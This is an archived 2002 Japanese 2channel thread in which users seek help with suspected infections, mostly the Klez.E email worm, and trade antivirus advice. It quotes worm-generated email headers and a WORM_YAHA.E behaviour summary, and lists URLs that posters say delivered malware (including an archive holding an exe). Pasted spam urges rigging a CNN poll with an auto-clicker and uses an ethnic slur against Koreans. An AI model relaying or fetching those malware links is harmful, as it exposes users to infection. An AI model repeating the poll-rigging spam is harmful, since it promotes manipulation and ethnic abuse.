by ** with SMTP; 20 Jun 2002 14:49:46 +0900 (JST)
Received: from virmta03.aics.ne.jp ([157.205.253.148])
by imlmta02.aics.ne.jp (InterMail vM.5.01.03.13 201-253-122-118-113-20010918)
with ESMTP id < 20020620054946.KJKX26990_KlezE_@aso.aics.ne.jp >
for < Printpal@equalamail.marketsvc.net >; Thu, 20 Jun 2002 14:49:46 +0900
Received: from Mtgdudhux ([211.125.8.187]) by virmta03.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918)
with SMTP id < 211.125.8.187_KlezE_@aso.aics.ne.jp >
for < Printpal@equalamail.marketsvc.net >; Thu, 20 Jun 2002 14:49:07 +0900
From: telecom21 < telecom21@nikkei.co.jp >
To: Printpal@equalamail.marketsvc.net vipar@verio.net
gxb7j@email.qves.net wkh3bew@email.qves.net
cpa@vertcoms.com remove@vertcoms.com todd@freeyankee.com
rpash@optininc.com DIAProdMaint@qwestip.net
Subject: Welcome to my hometown
Message-Id: < 20020620054907.VUOL28882_KlezE_@aso.aics.ne.jp >
Date: Thu, 20 Jun 2002 14:49:45 +0900

------------------ Virus Warning Message (on the network)


Found virus WORM_KLEZ.E in file honbun
The file is deleted.

----------------------------------------------------

108 :100:02/06/20 19:25
>>101>>104さん
忙しい中、質問に答えていただき
ありがとうございました。
大変わかりやすくて嬉しい限りです。





109 :名無しさん@お腹いっぱい。:02/06/20 19:28
>>102
アンタお金ドブに捨ててるよー


110 :名無しさん@お腹いっぱい。:02/06/20 19:29
>>106
違った。
バスターVSノートンスレだ。
。。。なんだかなあ、マルチだったとしたらだが。


111 :名無しさん@お腹いっぱい。:02/06/20 19:33
処理できたらよしとして、そのまま使い続けたり
しなければいいが。。。

112 :100:02/06/20 19:41
>>110
すみません。
>>111
使いつづけています。
デスクトップとノートパソコン持ってて
ノートのほうはmail専用にして
壁紙以外は、画像その他は何も保存しないようにしました。
でも「klez」は開けませんでしよ。
彼女のアドレスだったんで何かな?と思いまして・・・

113 :名無しさん@お腹いっぱい。:02/06/20 20:28
>>112
製品のウィルス定義ファイルをちゃんと更新しろってことだろ。

114 :113:02/06/20 20:30
追加: オンラインで簡単にできるはずだよ。

115 :名無しさん@お腹いっぱい。:02/06/20 21:06
ポスペって、メールスキャンするときはなんか設定しないといけないんじゃなかった?
違ってたらスマソ。

116 :名無しさん@お腹いっぱい。 :02/06/20 21:39
↑誰か詳しい方お願いします

117 :名無しさん@お腹いっぱい。:02/06/20 21:56
>>115
何のアンチウイルス使ってるかによって変わる。

118 :名無しさん@お腹いっぱい。:02/06/20 21:58
>116
あんた>100さん?

119 :名無しさん@お腹いっぱい。:02/06/20 22:49
友人らしき相手からメールが。
件名が「All Rights Reserved.」。本文無し。border.exeという添付ファイルあり。これらのキーワードで検索しても出てこなかった。
何てウイルスでしょうか?

120 :cheshire-cat:02/06/20 23:23
>>119
KLEZなどは、件名や本文や添付ファイル名のランダム性のため、それだけではウイルス名を判別できませんです。

121 :名無しさん@お腹いっぱい。:02/06/20 23:23
>>119
ウイルススキャンすればそんな質問は(以下略

122 :名無しさん@お腹いっぱい。 :02/06/20 23:34
postpetとかでもklezに感染すると
メール送っちゃうですかね?

123 : :02/06/20 23:37
ttp://isweb9.infoseek.co.jp/computer/vblave/cgi-bin/source/up0012.zip
うっかり踏んでしまいました…(涙)勝手にダウンされた模様(涙)
これって何ですか〜?!見つからないし
被害も今のところ無いです(涙)誰か教えてください〜!!!!
ただいまノートン先生稼働中


124 : :02/06/20 23:39
>>123
ノートン先生に任せておけ

125 : :02/06/20 23:40
ノートン先生最近うんとも寸とも言わなくてちゃんと働いているのか不安なんです(涙)
これ見たことありますか?誰か〜(涙)(涙)
一ヶ月前はしょっちゅううるさいこと言ってきたのに…(アタックがどうのとか)

126 : :02/06/20 23:53
>>125
定義のアップデートをしてないとか言うなよ?


127 :名無しさん@お腹いっぱい。:02/06/21 00:25
>>123
もうなくなってるぜ・・・

128 :名無しさん@お腹いっぱい。:02/06/21 09:27
>>122
PostPetが送るんじゃなくて
Klezが勝手に送るんだよ

129 :対策せよ!:02/06/21 11:34


130 :名無しさん@お腹いっぱい。:02/06/21 12:39
ベッカムウイルスって何?

131 :名無しさん@お腹いっぱい。:02/06/21 12:47
>>130
http://headlines.yahoo.co.jp/hl?a=20020620-00000001-bcn-sci

132 :130:02/06/21 13:33
>>131
スレッドがなかったのでとりあえずここに書いてみた。
ありがとう。


133 : :02/06/21 20:59
>>123
何か超高速でdlされた気がした.......ノートン反応しなかったぞ?!
dlされた物も見つからない?

134 :名無しさん@お腹いっぱい。:02/06/21 21:45
>>133
0012.zipとかで検索してみれば?なかったらないんだろう。

135 : :02/06/22 00:59
alg.exeというファイルを利用するゾーンアラームに訊かれたのですが、
このファイルの意味がわかりません。検索しても見つかりませんでした。
 ご存知の方教えてください。


136 :age:02/06/22 03:01


137 :WORM_YAHA.E :02/06/22 11:18
○ウイルス名: WORM_YAHA.E (ヤハ)
○危険度:低
○ウイルス活動:
<ワーム活動>
Windowsのアドレス帳ファイルとメッセンジャーソフト(MSN Messenger、
Yahoo Pager、ICQ)のコンタクトリストからメールアドレスの情報を取得し、
メールの送信先や本文中で使用される記述用のデータとして使用します。
送信するメールの件名、本文、添付ファイル名は複数の候補からランダムに
選ばれます。添付ファイルは二重拡張子の形で、後ろの拡張子はBATかSCRで
す。
添付ファイル名例:"biodata.xls.scr"

メール送信にはシステム内で標準に使用されているSMTPサーバの情報を利用
します。情報が取得できなかった場合にはあらかじめ保持している複数の
SMTPサーバの情報の中から選択します。

<プロセス停止>
特定の文字列を含むプロセスを強制終了させます。これはウイルス対策製品
の活動停止を狙った活動と考えられます。



138 :素人です:02/06/22 19:19
これってウイルスでしょうか??

インターネットのページ開いて、次ページボタン押したら(その後パニくってどこかもわからない)インタアーネットエクスプローラーが30くらい開いて、ネットワーク状態を
教える??のも同じくらい開いて・・・。
これってウイルス??
Xpなんですが、ウイルスソフトは何がいいかもわからないし・・・。
これがウイルスかどうかと、何のソフトがいいのか教えてください。

あと、ホットメールで画像を送ろうとしたらウイルスついたのは送れないって・・・。
上の奴と関係あるのでしょうか??


139 :名無しさん@お腹いっぱい。:02/06/22 19:24
>>138
すぐに回答こないからといって別スレに同じ質問するな、そういうのはマルチといって嫌われている。
有償でサポートやってるわけじゃないんだぞ。

140 :素人です:02/06/22 20:37
すいません・・・。
かなりあせってるモンで・・・。

141 :名無しさん@お腹いっぱい。:02/06/22 21:08
>>140
常時接続か?ブロードバンドならシマンテックのノートンアンチウィルス体験版インストールしろ。
最初の説明ではただのブラクラくさいけど、画像が送れなかったってのが気になる。
オンラインチェックならこのスレにも載ってるし、やってみれば?(Trend Microかシマか)

142 :素人です:02/06/22 21:40
今、必死こいてダウン中です。
エッジ(32K)だからあと数時間??かかるみたい・・・。
エラーにならなきゃいいけど・・・。
明日また書き込みます・・・。


143 :名無しさん@お腹いっぱい。:02/06/22 21:58
>>142
何?電話代高いだろ。そんなことなら、オンラインスキャンで済ませて
明日製品買ってくりゃ良かったのに。オンラインでもかなり検出できるはずだよ。
まあ始めちゃったものは仕方ないけども。それにさ、もし本当にKlezとかに
感染してたら今頃ウィルスメール送りまくってるな。

144 :cheshire-cat:02/06/22 22:03
>>142
これ使え。

Antidote簡易版
http://www.vintage-solutions.com/Japanese/Antivirus/Super/

>>143
トレンドのオンラインスキャンは、あくまでも「最後の手段」、みたいな。
ウイルス定義ファイルを破壊されても有効だが。

145 :素人です:02/06/22 22:22
つなぎ放題なので・・・。
ただ、田舎だからめちゃ遅いんだよな〜。

146 :cheshire-cat:02/06/22 22:26
>>145
今ISDNのフレッツ(常時接続定額なサービスね)がさ、全国規模で過疎地対応するようだから、NTTに問い合わせてみ。

147 :素人です:02/06/23 08:31
今、ウイルスバスターでスキャン中なんですが、
ノートン先生??とどっちがいいのでしょうか??
好みでしょうか??
出来るだけ操作簡単なのを教えてください。
ちょっとスレ違いの気もしますが・・・。

148 :素人です:02/06/23 09:06
???????
ウイルスバスターでひっかからなかった・・・。
パソコンのファイルには感染しないでフロッピーの画像にのみ
(自分のデジカメで写してパソコンに転送した画像)
感染するなんて事があるのでしょうか??
元々はパソコンから入れたのに・・・。
今はその画像はフロッピー自体をフォーマットして無くなったのですが・・・。
安心してもいいのでしょうか??
それとも体験版には引っかからないウイルスなのでしょうか??

149 : :02/06/23 09:39
>>148
何をいいたいのか意味不明
まるでウイルスと分かってるファイルをスキャンしているようにしか
思えないのだが

150 :名無しさん@お腹いっぱい。:02/06/23 10:03
>>148
たぶん感染していないと思うがちゃんと定義ファイル更新してからもう一回
スキャンしてみ。あ、バスター体験版はできないか。じゃ、オンラインウィルスチェックかな。

ノートンもそう面倒ではないけど重くなるね。他スレ読めば?

151 :素人です:02/06/23 14:42
>>149
元はホットメールに画像添付しようと思ってやってたら
ウイルスついたメールは送らないってけられたんです・・。
それで夜にあわててソフト探したりして・・・。
わかりにくいっすね俺の文章・・・。
勉強しなおすか・・・。

152 :名無しさん@お腹いっぱい。:02/06/23 17:47
誰か知ってる人いますか?
今日僕のメールボックスに謎のメールが2通。
いずれも200kバイト弱だが微妙にサイズが違う。
1つは件名が「Allrights Reserved」、もう一つは「iloveasada」。
恐らくウィルスだと思い、消したのですが、心当たりありますか?
ネット上で検索しようにも、引っかからないもので・・・。


153 :名無しさん@お腹いっぱい。:02/06/23 17:49
>>152
あっそれおれが送ったやつだ、ははは。

154 :名無しさん@お腹いっぱい。:02/06/23 17:51
>>153
McAfeeのVirusScanバージョン古いから今の定義ファイル動かないのに・・・。

155 :名無しさん@お腹いっぱい。:02/06/23 18:18
>>151
(152&154と同一人物)
Hotmailはウィルス付きメールを受け付けなければ、添付ファイルを送ってもこないはず。
ブラウザから見ても添付ファイルは送られてこないはずよね?


156 :  :02/06/23 18:56
添付ファイル : Cuux.exe (115k)
ホットメールでこんなのが添付ファイルとしてついてきました(相手は知らない人、外人っぽい
これに心当たり有りますか?
題名は:Tokyo Broadcasting System, Inc. All Rights

157 :名無しさん@お腹いっぱい。:02/06/23 19:06
>>156
検索できん・・・。
というか、「Tokyo Broadcasting System」って、「TBS」だぞ。

158 :  :02/06/23 19:19
>>157
今題名を検索してみたらTBSでしたね。。。。w
メール全文張っておきます

差出人 :"Candy Jonson" <*****@hotmail.com>

本文:
From: "Candy Jonson"<xxxxx@hotmail.com>
To: xxxxx64@hotmail.com
Subject: Tokyo Broadcasting System, Inc. All Rights
Date: Sat, 22 Jun 2002 18:58:39 +0000

差出人と「from」のアドレス違うし・・・・
俺のアドレスと「to」が違います・・・・・
どういうコトですかねえ。。。


159 :cheshire-cat:02/06/23 19:21
>>158
どうぞ。
http://pc.2ch.net/test/read.cgi/sec/1024255721/

160 :  :02/06/23 19:26
>>159
らしいですね・・・・

161 :名無しさん@お腹いっぱい。:02/06/23 19:36
(152)
誰か答えてくれません?

162 :cheshire-cat:02/06/23 19:43
>>161
今時は件名だけでは断言できなかったりします。
159へどうぞ(多分)。

163 :名無しさん@お腹いっぱい。:02/06/23 19:47
>>162

じゃあ、とりあえずメールの概要を書けるだけ書きます。(差出元はプライバシーの関係もあるので一部省略)

[iloveasada]
件名:Allrights Reserved
差出元:******@hanmir.com
本文:Allrights Reserved.

[mitsuto]
件名:Darling
差出元:******@pastel.ocn.ne.jp
本文:Darling

だったとおもう。今更削除ファイル見に行きたくもないので。


164 :cheshire-cat:02/06/23 20:11
>>163
ここで誰かに聞くよりも、添付ファイルをDLしてアンチウイルスソフトでチェックした方が早いような気が。

KLEZだったら件名・差出人・本文はランダムやファイルからの抽出文字列なんだし。

165 :名無しさん@お腹いっぱい。:02/06/23 21:46
>>164

とりあえず、感染していないようです。下手に触って感染する方が恐いですから・・・。
ありがとうございました。

166 :tx:02/06/23 22:35
親戚のパソコンなんですけどウイルスの影響でハードディスクが認識されなく、起動できなくなりました。
誰かこの症状の原因をおしえてもらえませんか?
お願いします。

167 :名無しさん@お腹いっぱい。:02/06/23 22:40
>>166
それだけで判ったら神

168 :名無しさん@お腹いっぱい。:02/06/23 22:40
>>166
それだけじゃわからんよ。でもなんでウィルスと断定できるの?
なんか怪しいファイルを実行しなかったか?今、被害者多いぞ!

169 :名無しさん@お腹いっぱい。:02/06/23 22:40
>>166
起動出来なきゃ再インスコしかない。
綺麗にフォーマットしてOS入れ直してね!

170 :●i太:02/06/23 22:42
>>166
f5押しながら軌道できなければご臨終です。チーン

171 :名無しさん@お腹いっぱい。:02/06/23 22:44
>>170
何それ?

172 :すみません。:02/06/23 22:44
http://uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
これを解凍して、起動したらえらいことに・・・。
どうすればいいか教えてください。
お願いします。

173 :名無しさん@お腹いっぱい。:02/06/23 22:45
>>172
どのスレで踏みました?
話はそれから

174 :名無しさん@お腹いっぱい。:02/06/23 22:46

もしBIOS破壊されていたらメーカー修理しかないという罠。

175 :●i太:02/06/23 22:47
>>171
safeモード

176 :名無しさん@お腹いっぱい。:02/06/23 22:47
>>175
機種によって違いますよ

177 :すみません。:02/06/23 22:52
>>173さん
恥ずかしながら、ニュー速です。
なんかいろいろ見てたら復活むりそうです。
再起動してしまいました。


178 :名無しさん@お腹いっぱい。:02/06/23 22:54
>>177
はい、お疲れ様でした

179 :●i太:02/06/23 22:54
http://support.jp.dell.com/jp/jp/faq/100051.asp
ではこれを

180 :tx:02/06/23 22:55
ハードを認識しないのでfdiskもできません
メーカー修理しかないのでしょうか?


181 :名無しさん@お腹いっぱい。:02/06/23 22:59
>>180
で、ウィルスと判断した根拠は?

182 :tx:02/06/23 23:07
起動時にウイルスが原因かあと何か表示されたのですが忘れたけど違ったのでウイルスの方だとおもったのですが


183 :tx:02/06/23 23:09
突然ハードが認識されなくなることってあるのでしょうか?


184 : :02/06/23 23:22
>>183
ある

185 :名無しさん@お腹いっぱい。:02/06/23 23:36
>182
もしかしてwin起動ディスクで起動したときに表示されたこと?
認識できなければとりあえず表示してくるものだから当てにならないと思われ。

ところで物理的な接続不良など確認してみた?
それとハードを認識できていないせい・・と考えたのはどういう理由から?
ちょっと情報少ないよ

186 :tx:02/06/23 23:38
どんな理由が考えられますか?
状況としてオンラインゲームをしてる時に突然画面が黒くなって装置設定の画面になり
どうにもならなくなりました。
教えてください。お願いします。

187 :●i太:02/06/23 23:40
つーか
ハード板かwin板かに逝った方が早いかと思われ・・・

188 :名無しさん@お腹いっぱい。:02/06/23 23:42
>>186
まずは、そのゲームで同じような状況になった人がいるかを探した方がいいかもしれませんね

189 :tx:02/06/23 23:47
接続不良などは、確かめてみたのですが・・・・
認識しないと思われる理由はfdiskする時ハードがないとでてくるのと
scandiskしたら1秒くらいで終了して異常なしとでてきます。
異常だらけなのに異常なしって…



190 :名無しさん@お腹いっぱい。:02/06/23 23:49
毎日2〜3通、異なるアドレスからウイルスが届きます。
でも、ヘッダ情報を見ると↓この2行は必ず同じ。

>Received: from ns.*****.co.jp (ns.*****.co.jp [61.***.***.242])
>by mail1.***.ne.jp (8.9.1/***/20000324-***)

これって、この会社が踏み台にされているのでしょうか?
それともこの会社自体が送ってきているのでしょうか?
教えてくださいm(_ _)m

191 :tx:02/06/23 23:49
yahooゲームのオセロなんですけど他には居ないかと思われます。

192 :  :02/06/23 23:57
WinXPのゲームで「インターネットハーツ」をやっている時、たまに
「初級韓国語」を相手にすると「壊れたデータをうけとりました」と
ポップアップがでます。奴らへんなことやってるかも。

193 :名無しさん@お腹いっぱい。:02/06/24 00:05
This is a very nice game
This game is my first work.
You're the first player.
I hope you would like it.

なんか添付ファイルでこんなのが来ました。
件名は「A nice game」。
本アドみたいで、フリメではないです。
同じようなの貰った人いますか?

194 :名無しさん@お腹いっぱい。:02/06/24 00:06
>>193
Klezだよ。

195 :名無しさん@お腹いっぱい。:02/06/24 00:08
>>190
ここのレス2を見てみて。
Klez.E、Klez系スレッド part3
ttp://pc.2ch.net/test/read.cgi/sec/1024255721/


196 :193:02/06/24 00:11
>>194
本当ですか!!ありがとうございます。
すぐに削除します!!
とうとうKlezが私にも・・・・・。

197 :名無しさん@お腹いっぱい。:02/06/24 00:11
>>196
喜んでるだろ(w

198 :193:02/06/24 00:15
>>197
そんなことないです。

199 :demo.exe・・・KlezE:02/06/24 00:17
Received: from imfep04.kcom.ne.jp (210.174.120.150) by ** with SMTP; **
Received: from Qhhbglmk ([211.125.8.239])
by imfep04.kcom.ne.jp (InterMail vM.4.01.03.00 201-229-121) with SMTP id < 20020623134639_RSHJ8525_KlezE@imfep04.kcom.ne.jp >
for < cpa@oin.oin20.com >; **
From:siva-siva< siva-siva@mail.goo.ne.jp >
To: cpa@oin.oin20.com 20020623134639_RSHJ8525_211_125_8_239_KlezE_@imfep04.kcom.ne.jp
20020623134639_RSHJ8525_nttkngw03239_ppp_infoweb_ne_jp_KlezE_@imfep04.kcom.ne.jp
Subject: A special nice game
Message-Id:< 20020623134639_RSHJ8525_211_125_8_239_KlezE_@mlist.kcom.ne.jp >
Date**

This is a very nice game
This game is my first work.
You're the first player.
I wish you would enjoy it.

添付ファイル
file.html
demo.exe・・・KlezE
file.txt
honbun・・・貸金庫の新聞記事

200 :名無しさん@お腹いっぱい。:02/06/24 00:21
2ちゃんねらーの力が必要です。皆さんおご協力お願いします。

【祭】2CNN投票「韓国が勝ったのはなぜ」2 【祭】
http://corn.2ch.net/test/read.cgi/news/1024835186/l50

1 :国民代表 :02/06/23 21:26 ID:z0dTlU5b
おいお前ら!!投票しろ!!
http://europe.cnn.com/
の右下だ!!圧倒的にチョンにやられているぞ!!

Has S.Korea got to the World Cup semi-finals as a result of:
(訳:韓国がワールドカップ準決勝に進出できたのは:)

Energy and ability (体力と能力によるもの)
Controversial refereeing decisions (審判のひいき)

Controversial refereeing decisionsに投票してくれ!!


連続投票ツール

連打ソフトはこれだよ!【連打くん】
http://www.vector.co.jp/soft/win95/util/se227453.html
†せつめい†
指定した間隔でマウスをクリックしてくれるソフト
いわゆる『連打機』みたいな『連打ソフト』だよ。
使い方はとっても簡単で起動したらまず間隔を入力します!
ちなみに『1』と入力した場合約1000分の1秒の間隔でクリック!
1秒間隔でクリックさせたいときは『1000』と入力してね
推奨は『1500〜3000』だよ!
クリックの開始はF10キーで、速打くんがアクティブじゃなくっても
クリックをはすぐに開始するよ。クリックの停止のときはALT
説明はこれだけ。ダウンロードは数秒。動作も軽いよ!

201 :190:02/06/24 00:36
>>195
ありがとうございますm(_ _)m
…うーん。真犯人みたいです。

送り主のns.*****.co.jp は大手レンタルビデオ店のFCを
愛知県内でチェーン展開している会社らしいです。
ここ数週間毎日送ってきます。
あーもう。晒したい(怒)

202 :名無しさん@お腹いっぱい。:02/06/24 00:42
2ちゃんねらーの力が必要です。皆さんおご協力お願いします。

【祭】2CNN投票「韓国が勝ったのはなぜ」3【祭】
http://corn.2ch.net/test/read.cgi/news/1024845084/

おいお前ら!!投票してくれ!!
http://europe.cnn.com/
の右下だ!! 圧倒的に韓国の執念にやられているぞ!!

──────────────────────────────
Has S.Korea got to the World Cup semi-finals as a result of:
●訳:韓国がワールドカップ準決勝に進出できたのは:

・Energy and ability (体力と能力によるもの)
・Controversial refereeing decisions (審判のひいき)
──────────────────────────────

「Controversial refereeing decisions」に投票してくれ!!
現在、52-48で負けている!2chの底力を見せてくれ!!    
連続投票可!
「vote」のボタンを押し続けてくれ。(画面は2〜3数分毎に更新されます。)

 ↓↓↓連続投票方法。すごく簡単!↓↓↓

http://www.vector.co.jp/soft/dl/win95/util/se228688.html
このソフトをDL。CNN投票ページのControversial refereeing decisionsにチェックをつけた状態で、
間隔の欄に3000〜5000を入れ、F10キーを押して後は放置するだけ。

203 :名無しさん@お腹いっぱい。:02/06/24 00:44
>>202
そこらじゅうに貼るな

204 :いわゆるT ◆uK3kI36M :02/06/24 01:05
http://uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
これに感染してしまいました。

どんなウイルスですか?再起動であぼーんですか??

すっげ〜こわい。dれかたすけて〜〜

205 : :02/06/24 01:08
>>204
それノートンでスキャンしても反応しないぞ。
シングルクリックで開くようにしてると感染???????????

206 :名無しさん@お腹いっぱい。:02/06/24 01:09
いや、中にexeがはいってる。
うかつだった。


207 :名無しさん@お腹いっぱい。:02/06/24 02:09
Macですがノートンで遂に警告がでますた。
削除してくれた様ですが
Oldgirl Hotline Trojan ってどんな種類のトロイなんでしょうか?
Hotlineに関係するものなのですか?

208 :名無しさん@お腹いっぱい。:02/06/24 02:56
>>204
ウィルスソフト入れてないの?
オンラインチェックでもやって名前出せばわかるよ。

209 :名無しさん@お腹いっぱい。:02/06/24 02:59
KlezE付きメールをプレビューしてしまったんですけど、
もうその時点でアウトですか?
もちろんそのメールは消しましたが。
対処法教えてくれ。トレンドマイクロのサイト見ても参考にならんのです。

210 :名無しさん@お腹いっぱい。:02/06/24 02:59
>>208
ネタです

211 :素人です:02/06/24 12:37
>>155

画像を送ろうとしたらけられました・・・。

212 :名無しさん@お腹いっぱい。:02/06/24 13:25
>>209 メーラーも書かずに聞いても答えられん。
IE5.01SP2、IE5.5SP2、IE6以外のIE/OEならプレビュー即アウトの可能性あり。
OEでなくてもIEのコンポーネント使うメーラーはアウトの可能性あり。
Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/参照
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/参照

213 :名無しさん@お腹いっぱい。:02/06/24 14:02
>>211
まだ言ってるの。その画像をウィルスチェックしてみれ。
ウィルス定義ファイル最新にしてさ。対策ソフト入れてないとか言わないこと。

214 :名無しさん@お腹いっぱい。:02/06/24 15:15
スペースキー押すとインターネットエクスプローラーの最初の画面にきりかわる。エンター押すとメールの画面になる。改行もできない。これウイルスですか?どうしたらよいですか?

215 : :02/06/24 15:25
>>214
何を言ってるのか意味不明
ウイルスと思うならウイルスチェックしろよ

216 :名無しさん@お腹いっぱい。:02/06/24 15:40
>>214
スキャンディスクしてみなよ。

217 :honbun・・・・・KlezE:02/06/24 17:05
Received:from kdd036.e-mail.ne.jp (EHLO kdd035.e-mail.ne.jp) (210.155.38.36)
by ** with SMTP; **
Received:from nttkngw012079.flets.ppp.infoweb.ne.jp ([61.124.50.79] helo=Ltnny)
by kdd035.e-mail.ne.jp with smtp (Exim 3.33 #1) id **
for marketing@paymentmarketing.com ; **
From:minesao< minesao@geocities.co.jp >
To: marketing@paymentmarketing.com remove@paymentmarketing.com
61_124_50_79_KlezE_@kdd010.e-mail.ne.jp
61_124_50_79_KlezE_@kdd035.e-mail.ne.jp
nttkngw012079_flets_ppp_infoweb_ne_jp_KlezE_@kdd010.e-mail.ne.jp
Subject: Fw:marketing,congratulations
Message-Id:< nttkngw012079_flets_ppp_infoweb_ne_jp_KlezE_@kdd035.e-mail.ne.jp >
Date**

添付ファイル
file.html
honbun・・・・・KlezE
file.txt
honbun

218 :名無しさん@お腹いっぱい。:02/06/24 20:01
すいません。先週あたりからパソコンがおかしいのでどなたか助言をいただけませんか?
 症状はネット(電話線から電話をかけてつなぐやつです。)をつなげて
5分くらいたつと、何もしていないのに右下のタスクバー?に出ているパソコンマーク
が光り始めて、なんかかってに通信されているみたいなのです。
これってウイルスでしょうか?

使っているパソコンはVAIOです。
どなたか助けて(;;)

219 :名無しさん@お腹いっぱい。:02/06/24 20:07
>>218
何でもないと思うけどね。ちなみにOSはWindowsだよね。Auto Update 機能が働いてると
自動的に通信するし、その日のニュースを自動で仕入れてくれるソフトも入っていたりするよ。
キミのにはないかな?

220 :cheshire-cat:02/06/24 20:07
>>218
状況がよーわからんのですが。
まずは。
Windows98やMeならスタート→プログラム→MS-DOSプロンプト
NT系なら、スタート→プログラム→アクセサリ→コマンドプロンプト

んで、netstat(半角スペース)-an

Protocol、Local Address(のうちの、「XX.X.XX.XX:YY」のYYの部分)、Foreign Address、Stateを書いて下さい。


221 :cheshire-cat:02/06/24 20:09
219の人の書き込みの通り、自動メルチェックとか、OSや何かのアプリの自動アップデートチェックだと思うけどね。

222 :名無しさん@お腹いっぱい。:02/06/24 20:16
あ、そうなんですか?
一応ウインドウズxpです。
その他の設定は一切触れてないので基本設定のまま?だと思います。
ウイルスではないみたいですね!安心しました。

223 :名無しさん@お腹いっぱい。:02/06/24 20:17
ちなみにタスクマネージャーを覗いても、右下のタスクバーを見ても何も変化がないのです。
普通自動アップデートとかするときって何かタスクバーに表示されたりしませんか?
聴いてばかりですいません・・

224 :名無しさん@お腹いっぱい。:02/06/24 20:20
ちなみに今そのパソコンを使っていないので220さんがおっしゃっている
操作ができません。すいません。

225 :cheshire-cat:02/06/24 20:26
>>222
>基本設定のまま
それって自慢にならないって思う、まずい。
話がそれるけど。
とりあえず、コントロールパネル→管理ツール→サービス→Remote Registry Serviceを無効にするようにお勧めします。

netstatの結果がわからなければ、メルくれれば見ますが。


226 :名無しさん@お腹いっぱい。:02/06/24 20:31
すいません、またそのパソコンを開きしだいご連絡いたします。
ご丁寧にありがとうございました。少し気が晴れました。
全フォーマットかなーって思っていましたので・・・。

227 :名無しさん@お腹いっぱい。:02/06/24 20:36
>>225
横レスですがXPに「Remote Registry Service」は、ないでーす。
あと、XPなら netstat -ano でプロセスIDも表示できるので
タスクマネージャの「プロセス」タブでPIDを表示させればEXEとの照合ができます。

http://www.katch.ne.jp/~aok/contents/internet_security/020.html

228 :cheshire-cat:02/06/24 20:41
>>227
ありゃ、Home Edittionに無かったっけ?すまんっす。

プチ勉強になりました。多謝。

229 :cheshire-cat:02/06/24 20:46
あれ?

230 :名無しさん@お腹いっぱい。:02/06/24 22:05
主人が超早漏で困っています。
あまりの早さに、笑いをこらえるのがやっとです。
そしてその後猛烈に虚しくなります。
こんな一瞬で終わるのに、わざわざ服脱がすなよ・・・
という感じで。
本人がそれを情けないとも何とも思っていないのが
よけいむかつきます。


231 :名無しさん@お腹いっぱい。:02/06/24 22:17
で?ウィルスとどう関係があるんですか?リアルウィルスはここでは扱ってませんが?

232 :218:02/06/24 23:35
先ほどぱそを立ち上げてみたところやはり同じような出来事が起こってしまいました。
しかもほかのページを開くのも苦労するくらいすさまじい勢いでダウンロード?がなされているようです。
また先ほどcheshire-catさんがおっしゃってた方法でnetstatコマンド打ってみましたが
始めはあまりなかったのですが、そのダウンロードが始まると、一気に増えました。
コレはどういうことなのでしょうか?
またどこのTCP UDP を提示すればよいですか?沢山在るのですが・・・

233 :名無しさん@お腹いっぱい。:02/06/24 23:46
詳しい方もおられるようなのでご質問をお願いしたいのですが、
私先日、他スレでも話題になっているマンキンにやられました。
OSはXPで、システム用NTFSドライブ80Gと、データ用FAT32ドライブ80G全て逝かれました。
で、そのデータ用のドライブの物理結線を外さず、フォーマットもしないまま、
そのままシステム用ドライブの方をフォーマット後OSを再インストールしました。
そこで、あ!と思い出したようにデータ用のドライブの結線に気付き、
既にシステムは完全に入れ替えた後になって結線を外しました・・(激反省)。
今そういう状態でして、システムドライブをウイルス検索しても何も出てきませんし、
使っていて挙動不審ということもないのですが。

そこでご質問したいのですが、OS再インストールの際、感染したデータドライブを
付けたままだったというのは、これは大丈夫でしょうか?
ご面倒おかけします、どなたかヨロシクお願いします。

234 :名無しさん@お腹いっぱい。:02/06/25 00:04
>>232
ここでAd-awareダウンロードしてきて使ってみたら?
おかしいでしょ。そんな状態。

スパイウェア発見専用ソフト「Ad-aware」 part2
ttp://pc.2ch.net/test/read.cgi/sec/1020360932/
HP(ダウンロード)
ttp://www.lavasoft.nu/

235 :名無しさん@お腹いっぱい。:02/06/25 00:05
>>233
対応予定のトレンドマイクロの説明が無いので分かりませんが、
システムの方が削除されてしまえば感染はしないと思います。
画像なんかにひっつくと言う事はないでしょう。
心配で悩むのであれば、もう一回再フォーマット。

236 :Virus Warning Message :02/06/25 00:10
Received:from nu.vpo.fenics.or.jp (202.248.63.186) by ** with SMTP; **
Received:from Aape (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id XAA06380 for < hostmaster@ccom.net >; **
Date**
Message-Id:< 200206241412_XAA06380_KlezE_@nu.vpo.fenics.or.jp >
From:kymd< kymd@eastcom.ne.jp >
To: ES2508_20020620_1658@funfabdeals.com remove@paymentmarketing.com
marketing@paymentmarketing.com asnadmin@interland.com
Subject:Fw:ES2508_20020620_1658,welcome to my hometown

------------------ Virus Warning Message (on nu)

LAW is removed from here because it contains a virus.

---------------------------------------------------------

237 :名無しさん@お腹いっぱい。:02/06/25 00:19
>>236
コピペする必要なし。

238 :名無しさん@お腹いっぱい。:02/06/25 00:43
W32.HLLW.Kazmor
これって危険なの?シマンテックのHP見ただけじゃわからない

239 :コピペ野郎:02/06/25 00:51
>>238
W32.HLLW.Kazmorは、ハッカーが侵入先コンピュータを制御できるようにするバックドア・トロイの木馬の能力を備えたワームです。

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.kazmor.html

240 :名無しさん@お腹いっぱい。:02/06/25 00:58
>>232
netstat -ano > c:\netstat.logしてlocal addressをメモ帳で編集して
全部コピペすればいい。

>>233
何のウィルスか分からない異常誰も何とも言えません。

>>238
一個所でわからないなら、余所のも見る。

241 :名無しさん@お腹いっぱい。:02/06/25 01:55
何かjpg画像が勝手にあぼーんしちゃうんですけど、これってウィルスなんですかね?
(文字通り画像が「あぼーん」って表示されるんですけど)

242 :名無しさん@お腹いっぱい。:02/06/25 01:58
>>241
どっかで聞いたけどな・・・

243 :241:02/06/25 02:05
画像落とした時はちゃんと表示されてるけど、しばらくしてから見るといつのまにかあぼーん。
怪しいURLは踏んでないとおもったんだけどなぁ…


244 :241:02/06/25 02:09
メール自体もほぼ使ってないから、ウィルスだとしてもどこで感染したかわからん。
ブラクラなのかな?
